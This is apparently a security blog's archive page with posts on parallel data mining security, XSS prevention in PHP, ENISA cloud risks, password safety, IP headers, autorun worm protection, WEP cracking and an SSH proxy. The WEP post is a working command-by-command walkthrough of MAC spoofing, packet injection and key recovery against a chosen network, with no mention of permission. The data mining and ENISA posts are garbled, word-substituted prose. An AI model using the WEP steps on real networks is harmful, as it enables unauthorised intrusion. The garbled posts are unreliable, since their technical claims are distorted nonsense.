*Parallelized* Data Mining (PDM) Security

April 12th, 2011   •   32 Comments   

Parallel Data Mining is currently attracting much research. Objects involved with ‘Parallel Data Mining’ include special type of entities with the ability to migrate from one processor to another where it can resume / initiate its execution. In this article we consider security issues that need to be addressed before these systems in general, and ‘parallelized systems’ in particular, can be a viable solution for a broad range of commercial tools.

In this section we will briefly describe some properties of these systems and more of parallelized systems. This is not intended to be a complete description of ‘anything and everything’ of the above mentioned topics. We try to focus on issues with possible security implications.

Here when we speak of ‘entities’ we mean an ‘object / process / matter / material / data stream’ that splashes some kind of independent, self-contained and certain ‘intelligence’. So now we believe I can say “An entity is often assumed to represent another entity, such as an integrated output of a classified cluster or some other organization or environment on whose behalf it is acting”. No single universal definition of entity exists, but there are certain widely agreed universal characteristics of entities, these include fluctuating ambiance/environment, autonomy, and elasticity.

  • [+] Fluctuating Ambiance means that the entity receives tactile input from its environment and that it can perform actions which change the environment in some way.
  • [+] Autonomy means that an entity is able to act without the direct intervention of other entities (or other objects), and that it has control over its own actions and internal state.
  • [+] Elasticity can be defined to include the following properties:
    • - Responsive: refers to an entities’ ability to perceive its environment and respond in a timely fashion to changes that occur in it;
    • - Pro-active: entities’ are able to exhibit opportunistic, goal-driven behavior and take the initiative where appropriate;
    • - Social: Entities should be able to interact, when appropriate, with other entities and humans in order to solve their own problems (like distributing instructions to various sects, assigning instructions to respective processors with respect to certain considerations etc.) and to help other entities with their activities.

A number of other attributes are sometimes discussed in the context of ‘Augur’. These include but are not limited to:

  • [+] Rationale: The assumption that an event will not act in a manner that prevents it from accomplishing its goals and will always attempt to fulfill those goals.
  • [+] Candor: The concept that an event will not ‘knowingly’ communicate false information.
  • [+] Cordiality: An entity cannot have conflicting goals that either force it to transmit false information or to effect actions that cause its goals to be unfulfilled or impeded.
  • [+] Mobility: The ability for an agent to move across networks and between different hosts to fulfill its goals.

Platforms or the desired infrastructure provide entities with environments in which they can execute. A platform typically also provides additional services, such as communication facilities, to the entities it is running. In order for entities to be able to form a useful parallel system where they can communicate and cooperate, certain functionality needs to be provided to the entities. This includes functionality to find other entities or find particular services. This can be implemented as services offered by other processes or services more integrated with the infrastructure itself. Examples of such services include facilitators, mediators, and matchmakers etc.

Security Issues w/t Parallel Data Mining..

In this section we will discuss security issues based on the characteristics described as above:

1) Entity Execution: Naturally entities need to execute somewhere. A host and the immediate environment of an entity, is eventually accountable for the accurate execution and protection of the entity. This straight forward leads us to the question of where access control decisions should be performed and enforced. Does the entity contain all necessary logic and information required to decide if an incoming request is authentic (originating from its claimant) and if so, is it authorized (has the right to access the requested information or service)? Or can the agent rely on the platform for access control services? The environment might also need certain protection from the objects that it hosts. An event should, for example, be prevented from launching a denial of service attack through consuming all resources on a processor, thus preventing the host from carrying out other things (such as executing other events scheduled).

2) Fluctuating Ambiance: What the term ‘environment’ indicates is that it totally depends on the application and appears almost to be considerably arbitrary in with respect to events literature; it can for e.g. be the ‘International Network’ viz. Internet or the host on which the entity is executing. An entity is assumed to be ‘conscious’ of certain states or events in its environment. Depending on the ‘nature and origin’ of this information, its authenticity and availability need to be considered. If an event’s ‘environment’ is limited to the processor on which it is executing, no specific security measures might be necessary (assuming the host environment is difficult to be spoofed keeping in mind the ‘objective proportional to time’ ratio). The situation is however likely to be totally different if the event receives environment information from, or via, the Internet.

3) Autonomy: This property when combined with other features given to entities, can introduce serious security concerns. If an entity, for e.g., is given authority to perform an objective, it should not be possible for another ‘party’ to force the event into committing to something, it would not normally commit to. Neither should an event be able to make commitments it cannot fulfill. Hence, issues in around delegation need to be considered for ‘entities ➨ events’ / instructions. The autonomy property does not necessarily introduce any ‘new’ security concerns; this property is held by many existing systems. It is worth mentioning that worms or viruses also hold this property, which enables them to spread efficiently without requiring any (intentional or unintentional) objects interaction. The lesson it indicates is that powerful features can also be ‘remixed’ and used for malicious purposes if not properly controlled in a controlled environment.

4) Communication Botheration: Of the ‘Elasticity’ properties, social behavior is certainly interesting from a security point of view. This means that entities can communicate with other events. Just as an entities communication with its surroundings / environment needs to be protected, so does its communication with other events. The following security properties should be provided:

  • - Confidentiality: Affirmation that communicated / proclaimed information is not accessible to unauthorized parties
  • - Data integrity: Affirmation that communicated / proclaimed information cannot be switched over / shaped / manipulated by unauthorized parties without being detected;
    • - Authentication of origin: Affirmation that communication is originating from its claimant;
    • - Availability: Affirmation that communication reaches its intended recipient in a timely fashion (‘Secure Negotiation’ protocols play a HUGE role here);
    • - Non-repudiation: Affirmation that the originating entity can be held responsible for its communications.

It’s a fact that “security usually comes at a cost”. Additional computing and communication resources are required by most solutions to the previously mentioned secure structured structures functionality. Therefore, security needs to be dynamic. A lot of times it makes sense to protect all communication within a system to the same level, as the actual negotiation of security mechanisms then ‘MAY’ be avoided. However, in a large scale parallelized data mining systems, security services and mechanisms need to be adjusted or tweaked to the purpose and nature of the communications of various applications with varying security requirements. Some implementations of varied architectures in the same niche assumes that security can be provided transparently by a lower layer i.e. adding it to data sects while distributing it to varied problems. This approach might be sufficient in closed or more precisely localized systems where the entities can trust each other and the sole concern is external malicious parties.

5) Maneuverability: The use of movable or mobile entities bumps a number of security concerns. Entities need protection from other entities and from the hosts on which they execute. Similarly, hosts need to be protected from entities and from other objects / parties (tools getting co-mingled with processes through varied form of injections and other vulnerable loopholes) that can communicate with the platform. The problems associated with the protection of hosts from malicious code are aptly understood. The problem posed by malicious hosts to entities and the environment seems more complex to solve. Since an entity is under the control of the executing host, the host can in principle do anything to the event and its code.

The particular objective of attack vectors that a malicious host can make / apprehend can be summarized as follows.

  • - Observation of code, data and flow control.
  • - Manipulation of code, data and flow control – including manipulating the route of an entity
  • - Incorrect execution of code
  • - Denial of execution – either in part of an event or whole
  • - Masquerading as a different host
  • - Eavesdropping and Manipulating other event communications

6) Rationality, Candor, and Cordiality: The meaning (from a security point of view) of these properties seems to be: “Events are well behaved and will never act in a malicious manner.” If we make this a bona fide requirement, then the required redundancy for such a system is likely to make the system useless. Affirmation that only information from trusted sources are acted upon and that events (or their initiators) can be held responsible for their actions, as well as monitoring and logging of event behavior, are mechanisms that can help in drafting a system where the implications of malicious events / entities can be minimized.

7) Identification and authentication: Identification is not primarily a security issue in itself; however, the means by which an entity is identified are likely to affect the way an entity can be authenticated i.e. if the labeling environment of an event gets knocked out or uncontrolled further actions would result the same. For example, an entity could simply be identified by something like a serial number, or its identity could be associated with its origin, owner, capabilities, or privileges. If identities are not permanent, security-related decisions cannot (more precisely should not) be made on the basis of an entities identity. While an entity’s identity is of major importance to certain applications and services, it is not needed in others. In fact, entities are likely to be ideal for providing anonymity to their initiators as they are independent pieces of code, possessing some degree of autonomy, and do not require direct third party interaction.

 

On our next post would spear off some technologies and methodologies which could get the above security issues ‘in a frame‘.

Can also see the post @Sectruni0.

Compliance Hacking | A new and defined terminology!

March 11th, 2011   •   No Comments   

Things which are ethical for me may not be ethical for you, so when we talk about something ethical, it’s all about moral philosophy and in my view moral philosophy is nothing more than a perception, which varies people to people and community to community.

Take a case, where, a hacker group from Pakistan trying to hack into India’s government communication system, it may be considered as ethical by Pakistani community but it’s totally un-ethical if you ask from an Indian. For instance check out those words in news, posted on one of Pakistan’s News Portal and follow up with the comment about latest CBI hack-attack. similarly take another example:

“Asquadron of Israel Air Force entered the airspace of Syria and pulverised an under construction nuclear fuel enrichment plant of Syria and returned home safely. Not a single shot was fired by Syrian Air Defence system because for those specific moments the Anti-Aircraft Control Plot of Syrian air defence system was disabled by Israel’s Signal Intelligence Unit 8200. Operation Orchard was successful.”

(source:http://www.securitywatchindia.org.in/PDFs/Salute%20March%202011.pdf) read out this recently published article, page no.34 and tell me, if you were an Israeli, what would you call it, ethical or un-ethical.

Compliance Hacking is a pure Information Security Terminology introduced by a well-known Information Security expert “Commander Saini” and lately endorsed by a reputed organisation IAMAI, acronym of Internet And Mobile Association of India.

I’m totally agree with the concept behind naming of this term, the best thing I like about it is one

Thwarting XSS!

January 7th, 2011   •   41 Comments   

Data containing HTML or Java Script can really be one of the BIGgest problem, specially when its is being specified by a ‘user’. For example simple application like Blog, where user can submit the comments after reading the post, which’s being displayed. If the user is ‘not-that-bad’ and enters only plain text, then seriously no problem. Let’s take if the user submit the data

<b><i>Post seems great.</i></b>

What will happen? The situation is not as easy as it seems to be, yet it gets complicated. Browsers will not be able to tell the difference between HTML tags which are displaying from Blog, it will directly get embedded in the comments.

It is still good if the user closes the HTML tags, like in above code. All the HTML codes are closed properly. If its not properly closed then this situation tends to get getting extremely bad, it will cause the browser to prevent page being displayed correctly. Like if someone submits the following the effects may not be that good!

<b or > or <a href="

The situation will get worse if it contains Java Script. A malicious personality can steal your cookies to his inbox, can redirect your pages to another web page, can burglarize your password which are saved in the ‘browser’. A lot of thing can be done by Java Script.

These kind of ‘problems where someone injects something which indirectly get many things’ are called XSS (Cross Site Scripting) attack.

If you think to be safe’f XSS then you need to work with code nicely and also keeping in mind that *you never should display the direct input from the user* will be an beneficial addon. You need to remove the HTML tags/Script first before displaying in the site.

You will feel good to know, Php gives you two functions to remove the HTML tags or encode the special characters.
1. strip_tags() : It removes the HTML tags from the string
2. htmlentities() : It encodes the special HTML characters.

Let’s see the how to use those functions:

//Remove the HTML to comments
$comment = strip_tags($_POST['comment']);
print $comment;

if the ($_POST['comment']) have

<b>Hi..</b> Your <div> <span>article</span> </div> seems <i>perfect.</i>

it will display simply.

Hi.. Your article seems perfect.

Now let’s see the htmlentities function:

//Remove the HTML to comments
$comment = htmlentities($_POST['comment']);
print $comment;

if the ($_POST['comment']) have

<b>Hi..</b> Your <div> <span>article</span> </div> is <i>awesome.</i>

It will display…

&lt;b&gt;Hi...&lt;/b&gt; Your &lt;div class=&quot;heading1&quot;&gt;&lt;
span&gt;article&lt;/span&gt;&lt;/div&gt; is &lt;i&gt awesome. &lt/i&gt

The characters have been changed to
< to &lt;
> to &gt;
" to &quote;

Now the browser will display the page as *if the browser's getting bizarre reading those damn not-so-good inputs from malicious user!*

You also need to put a default value to being prevented form XSS.
Make an array of default value. See in the example

if ($_POST['_submit_check']){
$default = $_POST;
}
else {
$default = array('name' => 'abc',
				 'email' => 'abc@abc.com',
				 'web' => 'www.google.com',
				 'content' => 'xyz');
}

See how to set the default value in multiline text area.

print '<textarea name="comment">';
print htmlentities($defalut['comment']);
print '</textarea>';

This can be a way of how we can prevent injecting scripts...

Reposted from 'Kuwait Hackers'

ENISA’s Cloud Computing Risk Summary

September 15th, 2010   •   8 Comments   

ENISA’s report on Cloud Security identified number of places where risk elements were identified viz. the report acknowledged 8 high risk items & 29 medium risk items in the varied areas of Policies & Organizational RisksTechnical RisksLegal Risks, and Cloud Unspecific Risks. In summary, the identified elements labeled as *key risk’s* are briefed below:

(1) Loss Of Governance: It’s giving Cloud infrastructure, client necessary seize control to the cloud provider and a number of issues which may effect security. But, at the same time service level agreement may not offer complete commitment to provide such services on the part of cloud provider, thus leaving a gap in the security defenses. Lack Of Governance’s a key issue here.

Vulnerabilities:

  • V34: Unclear Roles and Responsibilities.
  • V35: Poor enforcement of role definitions.
  • V21: Synchronizing responsibilities or contractual obligations to different stakeholders
  • V23: SLA clauses with conflicting promises to different stakeholders
  • V25: Audit or certification not available to consumers
  • V18: Lack of standard technologies and solutions
  • V22: Cross cloud applications creating hidden dependency
  • V29: Storing of data in multiple jurisdiction and lack of transparency about THIS
  • V14: No source escrow agreement
  • V16: No control on vulnerability assessment process
  • V26: Certification schemes not adapted to cloud infrastructures
  • V30: Lack of information on jurisdictions
  • V31: Lack of completeness and transparency in terms of use
  • V44: Unclear assets ownership

Affected Assets:

  • A1: Company reputation
  • A2: Customer trust
  • A3: Employee loyalty and experience
  • A5: Personal sensitive data
  • A6: Personal Data
  • A7: Personal Data: Critical
  • A9: Service delivery- real time services
  • A10: Service delivery

(2)Lock In Situation: Also ‘Lock In Situation’ has been considered. This can be a little unoffered of the way of tools and procedures from the standard data, from an ‘as a service’ interface’s that could guarantee data application service portability.
This can make it difficult for customers to migrate from one provider to another, to migrate data and services back to an inhouse IT environment. It introduces the dependency on particular cloud providers for service provisions especially if data portability had the most fundamental aspect, not enabled.

(3) Isolation failure: Which is comfortable because they are working mostly in multi-tenant environment and ‘share resources & they are defining characteristics of cloud computing’. This risk category covers the failure of mechanism, server install-age, memory, routing and reputation between different tenants. However, it should be considered that attacks result in a relational mechanism are still in mere risk and much more difficult for attackers to put in practice as compared to attacks on traditional operating system.

(4) Compliance Risks: Of course one of the key parts is the compliance risks. Investment and saving certificates may pull a risk by migrating to the cloud if the cloud providers don’t provide evidence of their own compliance with relevant requirement. And also for cloud provider they will not permit audits by cloud customer. In certain case it also means that ‘If you are using a public cloud infrastructure’ implies a certain kind of compliance cannot be achieved (for example PCI).

Vulnerabilities:

  • V25: Audit or certification not available to consumers
  • V13: Lack of standard technologies and solutions
  • V29: Storage of data in multiple jurisdictions and lack od transparency about this.
  • V26 Certification scheme not adapted to cloud infrastructure
  • V30: Lack of information on jurisdiction
  • V31: lack of completeness and transparency in terms of use

Affected Assets:

  • A20: Certification

(5) Management Interface Compromise: Now, it’s also a time that management interface compromise (MIC), may be an issue that customer management interfaces of a public cloud provides additional programmed effort’s of applications an increased with, especially when combined with remote access and web browser vulnerabilities.

(6 & 7) Data protection & Insecure or incomplete data deletion: Of course Cloud Computing poses several data protection risks. For cloud providers and customers in some cases it may be difficult for the cloud customer to get ‘correct level’ of data protection at all and for example if you leave this cloud provider it must be guaranteed that you have a complete data deletion. When a request to delete cloud resources is made the well merged prevailing system may not result into wiping the data. Adequate, primary data deletion must be or could be impossible; either become extra copies of data for restore; but unavailable.

Vulnerabilities:

  • V30: Lack of information on jurisdiction
  • V29: Storage of data in multiple jurisdictions and lack od transparency about this.

Affected Assets:

  • A1: Company reputation
  • A2: Customer trust
  • A5: Personal sensitive data
  • A6: Personal Data
  • A7: Personal Data: Critical
  • A9: Service delivery- real time services
  • A10: Service delivery

(8) Malicious insider: So, and a lot point of testing outbound by an either risk, was malicious insider which vitiates, but lightly. Damage which may be caused by malicious insider is often far greater. Cloud architecture necessitates certain rules over extremely high risks for example: includes Custom Provider System Administrative & Manage Security Service Provider.

Reposted from Sectruni0
This post can also be viewed here.

Online Safety: Things to Do & Things to Avoid

March 12th, 2010   •   6 Comments   
Either it is a battlefield or a football field, there are always certain safety tips given to people before going anywhere, & it is recommended to follow them all.

In the same way, for your Online Safety, there are things that you should know before you go Online

Things to do:

  • Use a combination of Alphabets(both upper & lower case character), Numbers and Symbols with at-least 8 character when creating a Password.
  • Change your Password immediately at your first login if it is a Default Password, a Temporary password or the one you received via email.
  • Change your Password Periodically or say, after a fixed interval of time.
  • If using a Public Computer, remember to Logout after completing your online session.(prefer PDA/Mobile instead if don’t have access to Personal Computer)
  • If you Store your Passwords in your Computer files then remember to encrypt it using some kind of predefined algorithm or by using different file encryption tools. Such as TrueCrypt or dsCrypt
  • Also make sure anyone watching you enter your Password may not guess as you type, like in case of typing a password using single hand can be seen easily.
  • On the login page, check for Secure login session(SSL Encryption) before you submit your password to server. Also confirm the certificate owner by double clicking the Lock icon. For instance, in case of https://mail.google.com , https confirms that the page is secure and data/Password you will submit will goes encrypted during transmission.

Things to Avoid:

  • Avoid use of Dictionary words, your name, important dates or other such Personal Information that can be easily obtained in case of Password and Security question.
  • Don’ use same Password for multiple online Account.
  • Also avoid using repeating characters(AAAAA or 11111) OR Keyboard patterns(qwerty or 123456).
  • Never send your password via Email.
  • Never use Public computer (like Cyber cafes,Shops,Hotel etc) to access a site that require Login, as it may contain Trojan,Keylogger,Spyware or other such malware which work in Stealts mode.
  • Never reply to mail which claims to come from any of your Online Account services (such as Yahoo,Hotmail,Ebay or Amazon) and asking you to disclose or verify your password, this could be a Spoofed mal or a Phishing attack to steal your password.
  • Never use Password Generator/Manager or such Utilities from untrusted source.
  • Never store your password in plain text format or on Sticky note.
  • And most importantly keep your Password private, if due to some reason you handled your password to someone to access your account then also remember to change it again after their access is no longer required.


please note, these are just few Points which help keep your Password safe and Protect your Online Privacy, but not enough to stay safe from other Cyber threats. There are a lot of other little things that should be kept in mind in order to stop the attack on your Online Privacy

Understanding IP datagram – the easy way

December 24th, 2009   •   8 Comments   

It is important to understand the information which is presented in an IP Packets as it helps you understand how the integrity of the information you send across a local network or the internet can be compromised.

Mainly IP datagram has two components: the header and the payload. The Header contains addressing and control fields however Payload carries the actual data.

Here for easy understanding I have clarified the IP datagram header field with a brief explanation;

IP Datagram Header

Version: This field is used to identify the IP version of the packet, in my example it is IPv4, it could be IPv4 or IPv6.

Header Length: This field identifies the size of IP header. It specifies the header in multiple of 4 bytes, so if you are getting a value of 5, it means the header is 20 bytes long.

Type of Service: This field helps router understand how they should queue the IP datagram, however ignored by most router. Service level that can be requested include level of priority, short delay, high throughput and reliability.

Total Length: This is the length of entire packet measured in bytes and includes both header and payload.

Identification: Value of this field is set by the sender of the packet and is used for reassembly of IP datagram at the destination.

Flags: Here the Don’t fragment and More fragments indicate whether an IP datagram can be fragmented, and if so, if it is the last fragment.

Fragment offset: It specifies where in the IP datagram this fragment belongs, measured in 8 bytes(64-bit block).

Time to live: It specifies the maximum number of links or hopes a packet can pass through; if number decreases by 0 before reaching the destination then the packet is destroyed.

Protocol: It identifies the Protocol used at the transport layer, it could be TCP or UDP

Header Checksum: This field checks for integrity of the header information but not the data.

Source: The IP address of the Source computer.

Destination: This is the IP address of the destination computer.

IP Options: This field is optional, it can be used to add loose source routing at the end of an IP header.

Also read the RFC791 for better understanding

Learn to Love your Log files

December 21st, 2009   •   No Comments   

Yes! Learn to Love your Log file, it tells everything you want to hear.

Even a Clever thief always leave his fingerprints anywhere at the crime scene, in the same way most of the malicious exploit and intruders leave their fingerprints or say footprint all over the Log file. If the log file management system was crafted correctly, it will tell you everything about the actual attack

You can expect a good result by set up an event management system that will collect, filter, and analyze your log file data, then prioritize and generate alerts.

Download this PDF(published by NIST U.S. Department of Commerce) and Read this whole story from Introduction to Operational Process.

Protecting Removable drive against malware

November 26th, 2009   •   6 Comments   

Today one of the fastest medium used by malware for infection is removable drives. Worms used it to replicate faster, once your removal drive come in contact with infected system it gets infected automatically by the malicious services running in system, one of the first task done by malicious services is to create AUTORUN information file into Removable drive for further propagation.

Now once you open these infected Removable Drives in any PC, AUTORUN file do there task, but question is How?

Actually AUTORUN file contains code for executing infected executable file instantly which were copied earlier somewhere in Removable Drives by malicious services.

The code within AUTORUN information file looks something like this:

[AUTORUN]
OPEN=recycler/setup.exe

In the above script recycler is a folder in removal drives which contain infected executable file (copied earlier by malicious services) that is now being used by AUTORUN file for propagation.

Here we can protect our Removal Drives against these worms by restricting changes to Autorun.inf file.

Step1: Create four folders in the root directory of your Removable drive with name Autorun.inf, Recycle, Recycler and Recycled.
Step2: Go to Start>Run and type cmd to open Command Prompt
Step3: Now type below command one by one
attrib autorun.inf /s /d –a +s +r
cacls autorun.inf /c /d administrators
Step4: Repeat Step3 for Recycle, Recycler and Recycled.

Here in the above procedure attrib command is used to set the folder attributes and cacls is used to set the privilege label to deny access for members of administrators group.

Once you have completed this task successfully you won’t be able to delete, rename, modify, copy or open these folders and this also prevent Malicious services running in any system to modify or copy infected files into Removable Drives.

Sample Images:1

Autorun1

Sample Images:2

Autorun2

Sample Images:3

Autorun3

Cracking wireless Network WEP protection

October 29th, 2009   •   34 Comments   

Stuffs required:

  • A compatible wireless Adapter: There are lots of compatible wireless adapter available, but what you need to care about is the size of your Pocket or say your budget. One can easily go for a good Alfa adapter that is easily available in Amazon but I’ll recommend going for AirPcap Adaptor which I discussed before in my previous thread.
    However Alfa “AWUS036H/AWUS036H + 9dBi” will be the best option as it is considered as the cheap & Best for everyone.
  • Back Track Live CD: Click here to download its DVD ISO if you don’t have one in your Collection. BackTrack is a Popular Linux distribution basically used for Penetration Testing.

Boot your System using Back Track Live CD, now Login with the default Username & Password(Usr:root & Pwd:toor). Once authenticated just type statX to bring KDE desktop.

Launch Konsole a built in Command Line interface and follow the below steps:

  • Type airmon-ng to get a list of available network interface card.
  • Choose the one you want to use to Crack WEP encryption and type airmon-ng stop interface_name to disable its monitor mode.
  • Now you need to change your MAC Address to fake one, but first make sure your card is disabled, you can disable your interface card with command ifconfig interface_name down
  • Now to change your MAC Address use the command macchanger –mac 11:22:33:44:55:66 interface_name
  • Restart the monitoring mode for this interface by running airmon-ng start interface_name

Once you have Successfully Facked your MAC address you can move to next Step:

  • Run airodump-ng interface_name to bring the list of available Wireless Network or Access Point.
  • Note down the BSSID, Channel Number(CH) & ESSID for the network you want to Crack WEP encryption.
  • Now we require to Capture all the packets to a file, type airodump-ng -c (Channel_Number) -w (file_name) –bssid (BSSID)
  • Run aireplay-ng -1 0 -a (BSSID) -h 11:22:33:44:55:66 -e (ESSID) interface_name
  • Now Run aireplay-ng -3 -b (BSSID) -h 11:22:33:44:55:66 interface_name

Now the above command will create a huge Traffic and consume more memory and Processor usages, just seat back and watch the number within the #Data column.
Once you received data more than 10000 packets, its time to go for final count down.

Open new Console window and Run the below command:
Aircrack-ng -b (BSSID) filename-01.cap

This final command should have printed WEP Key, if somehow it didn’t then you may need to get more data packets to Successfully complete aircrack.

Note:
interface_name refer to the name of your wireless interface (Ex- wth0/eth0)
BSSID refer to the BSSID of Wireless network
Channel Number refer to Channel number of Wireless network
ESSID refer to the name or SSID of Wireless network

Click the link for more information on Alfa AWUS036H or AWUS036H+9dBi

Build your own Web Proxy in 10 Easy Steps

October 23rd, 2009   •   12 Comments   

With the emergence of World Wide Web threats of Identity theft is greatly increased, now people instead of using traditional mail started using Electronic mail as default mode of communication, instead of using cash to buy needed stuffs they started using Credit Card online to buy whatever they wish. This made everything vulnerable to theft of data as well as identity. To get rid of these threats Internet geeks already started using the web proxy to safeguard there Online Security, but using Public Proxy server is still risky as you can not trust people you don’t know.

Here, today I’m going to discuss free and easiest way to build your own Windows based web Proxy Server in simple and easy steps that anyone with basic knowledge of networking & Administrative privilege can use it to increase the label of there Security.

Software Requirements:
OpenSSH
Putty
Privoxy
PortableFirefox
Steps involved in Installation & Configuration:
  1. Install OpenSSH on your PC
  2. Install Privoxy on your PC/Server
  3. Now install Putty/PortaPutty and PortableFirefox on your thumbdrive.
  4. Now as you have already installed OpenSSH just run it once and make sure SSHD service is running as system account and server is configured to respond on port/socket 443, also make sure you are able to SSH into your server from another machine on the same network.
  5. Configure Privoxy to run as a service and make sure port number is set to communicate on default port 8112.
  6. Now double click Putty to open its basic configuration window and specify the following:
    • Hostaname(or IP address) : ip_address_of_server
    • Port : 443
    • Protocol : SSH
  7. Now Go to SSH>Tunnels, and make the following entry within specified field:
    • Source Port : 8118
    • Destination : 127.0.0.1:8118
    • Click on radio button to select Local, Auto
  8. Now Go back to the Session section where you specified Hostname(IPAddress), and Save this whole session with a new name.
  9. Now finally Open Firefox and Go to Tools>Option>General tab>Connection Settings and select Manual Proxy Configuration:
    • HTTP Proxy : 127.0.0.1
    • Port : 8118
    • SOCKS v5
  10. Save this configuration and you are done.

Now all your web traffic is set to walk through the Proxy Server’s path which is configured in Putty, here in Putty it is configured to reroute all your web traffic to the server you are connecting through port 8118.

Here Thumdrive is used for your mobility and it is optional. For those who want to configure it on there system they can repeat the same with there favorite browser either Opera or IExplorer